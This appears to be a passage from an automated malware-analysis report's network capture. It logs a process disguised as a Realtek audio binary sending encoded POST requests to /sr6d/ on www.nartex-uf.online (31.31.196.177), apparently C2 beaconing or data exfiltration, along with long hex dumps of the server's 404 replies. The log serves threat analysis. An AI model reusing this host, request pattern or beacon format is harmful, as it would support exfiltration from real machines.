                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 11:58:09.222474098 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
                                                                                Nov 25, 2024 11:58:09.222517967 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
                                                                                Nov 25, 2024 11:58:09.222728968 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 11:58:09.222789049 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 11:58:09.222836018 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 11:58:09.223179102 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 11:58:09.223237991 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 11:58:09.223351955 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 11:58:09.223400116 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 11:58:09.438898087 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.11.204975231.31.196.177807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:11.713042974 CET750OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 68 78 59 76 6c 33 2f 77 66 44 52 46 54 30 48 6c 46 72 75 4f 73 74 51 64 55 59 71 67 2f 33 36 4f 50 78 72 4e 35 67 50 55 37 70 67 43 2f 5a 71 71 41 4a 38 48 4d 42 4a 71 48 2b 67 36 65 74 4c 32 69 67 41 34 66 53 78 44 53 53 35 66 76 78 51 4c 39 37 64 56 4d 64 79 48 50 66 7a 64 4a 2f 33 47 69 72 6f 2f 6a 77 4c 33 4d 67 64 37 45 78 64 6f 78 35 6c 56 46 54 5a 76 68 79 59 6c 37 4f 32 49 6f 34 38 51 5a 4e 49 55 68 34 67 62 63 72 4c 42 34 48 6f 6f 50 42 34 6b 37 65 79 45 6f 77 65 6b 75 31 7a 79 6f 78 31 41 58 43 67 42 44 4d 59 51 39 59 6f 4d 2b 43 50 47 50 61 4b 4e 37 6e 58 4e 51 54 59 6c 77 52 64 56 52 43 67 3d
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/36OPxrN5gPU7pgC/ZqqAJ8HMBJqH+g6etL2igA4fSxDSS5fvxQL97dVMdyHPfzdJ/3Giro/jwL3Mgd7Exdox5lVFTZvhyYl7O2Io48QZNIUh4gbcrLB4HooPB4k7eyEoweku1zyox1AXCgBDMYQ9YoM+CPGPaKN7nXNQTYlwRdVRCg=
                                                                                Nov 25, 2024 11:58:11.965981007 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:11 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 11:58:11.965997934 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
                                                                                Nov 25, 2024 11:58:11.966289997 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
                                                                                Nov 25, 2024 11:58:11.966407061 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 11:58:11.966506004 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 11:58:11.966516972 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 11:58:11.966800928 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 11:58:11.966815948 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 11:58:11.967093945 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 11:58:11.967108011 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 11:58:12.178956032 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.11.204975331.31.196.177807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:58:14.463921070 CET7899OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 68 78 59 76 6c 33 2f 77 66 44 52 46 54 30 48 6c 46 72 75 4f 73 74 51 64 55 59 71 67 2f 33 79 4f 50 67 4c 4e 37 48 37 55 36 70 67 43 33 35 71 70 41 4a 38 67 4d 42 51 68 48 2b 73 45 65 75 7a 32 69 44 49 34 61 6d 64 44 4c 43 35 66 6e 52 51 47 67 72 63 50 4d 64 6a 4f 50 66 6a 64 4a 2f 33 47 69 74 45 2f 6b 68 4c 33 42 41 64 30 54 42 64 30 31 35 6c 70 46 54 42 5a 68 79 63 50 38 34 47 49 76 63 51 51 62 37 38 55 70 34 67 5a 66 72 4b 45 34 48 6b 33 50 42 55 65 37 64 75 75 6f 33 36 6b 69 55 71 77 30 46 68 33 46 41 67 51 43 2b 63 32 2b 2b 39 61 67 67 54 53 4a 72 76 68 30 43 53 64 61 6a 49 50 72 77 4d 4b 50 6d 48 71 55 2f 36 39 56 55 75 50 6a 77 59 6a 31 6c 77 33 58 6c 6a 39 71 57 65 76 76 6d 76 5a 42 71 74 41 37 76 55 2b 67 4f 54 59 47 4e 46 52 65 32 4e 6d 47 42 32 56 78 46 76 36 51 73 31 56 77 44 76 67 57 36 55 6e 6d 72 59 79 79 53 6e 6c 46 62 35 45 6a 39 70 6f 45 78 41 41 61 6d 61 71 63 7a 6e 64 36 49 50 32 4e 55 74 74 30 42 71 62 48 74 68 64 69 6f 6c 79 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/3yOPgLN7H7U6pgC35qpAJ8gMBQhH+sEeuz2iDI4amdDLC5fnRQGgrcPMdjOPfjdJ/3GitE/khL3BAd0TBd015lpFTBZhycP84GIvcQQb78Up4gZfrKE4Hk3PBUe7duuo36kiUqw0Fh3FAgQC+c2++9aggTSJrvh0CSdajIPrwMKPmHqU/69VUuPjwYj1lw3Xlj9qWevvmvZBqtA7vU+gOTYGNFRe2NmGB2VxFv6Qs1VwDvgW6UnmrYyySnlFb5Ej9poExAAamaqcznd6IP2NUtt0BqbHthdiolypGWXeNhAyAvN4Y4Qen0hFnGDll3tsFtdtLgY0t+mh/sVc4v06/Wve2fIAQ7XG4vBZfRuWpm4emn/gK2CXW38k9uJQ/Qhx+Y0nOKSgt65avdU33gdE5fttQnLuV0S/BFuA3lLHD4+13T0NGh8kUu8gYPljYCAbrtSqZkK7AvohdbqekbCZGHOaV/On9psjOkHK1Nkr5c7owJ7cI92C74TY7Pk831Sxrt514CysI1w5f1qJxknIsK74aE7LE+K7vYowq/Z/dNyzkQ/BAV3HRbXbUyMzmPn0C7hmoPJu392t4H2z4O6qzN9+nBTD8bPa3THJMXxY5PyrUQf5WYqAYAA9nUrUrr6+2gG/0ef7++uBadN/mHWDf3RSOZKsuHe4kedx6ReHolf4Yd7TTqdkk/CNgCjgpJBQqq/Sj33FrOItRRN9MFNn6wpUCozBz7WeX6fOIx41iKY8xFXGcjc/Whf1QYIzI2SP40npSUqiMoHVVKpcGK3/Bnevh8HSfnhWUSLcjC3ZO2W3J7a4IcJP/m8DV45tk1pSpyqgSR6F446ADuRSIWA4W0k9UKgTm0u2AvTHdKQadtbSjgnsBK0G5pdlqS1kiN/QTxxjwp0RidRIUK3lMPK0+r6R+stIFMC4dmiI0A0nBoCu+oGhMlpPPRoOnG0FbQsqrgJ+O [TRUNCATED]
                                                                                Nov 25, 2024 11:58:14.713517904 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:14 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 11:58:14.713532925 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
                                                                                Nov 25, 2024 11:58:14.713658094 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
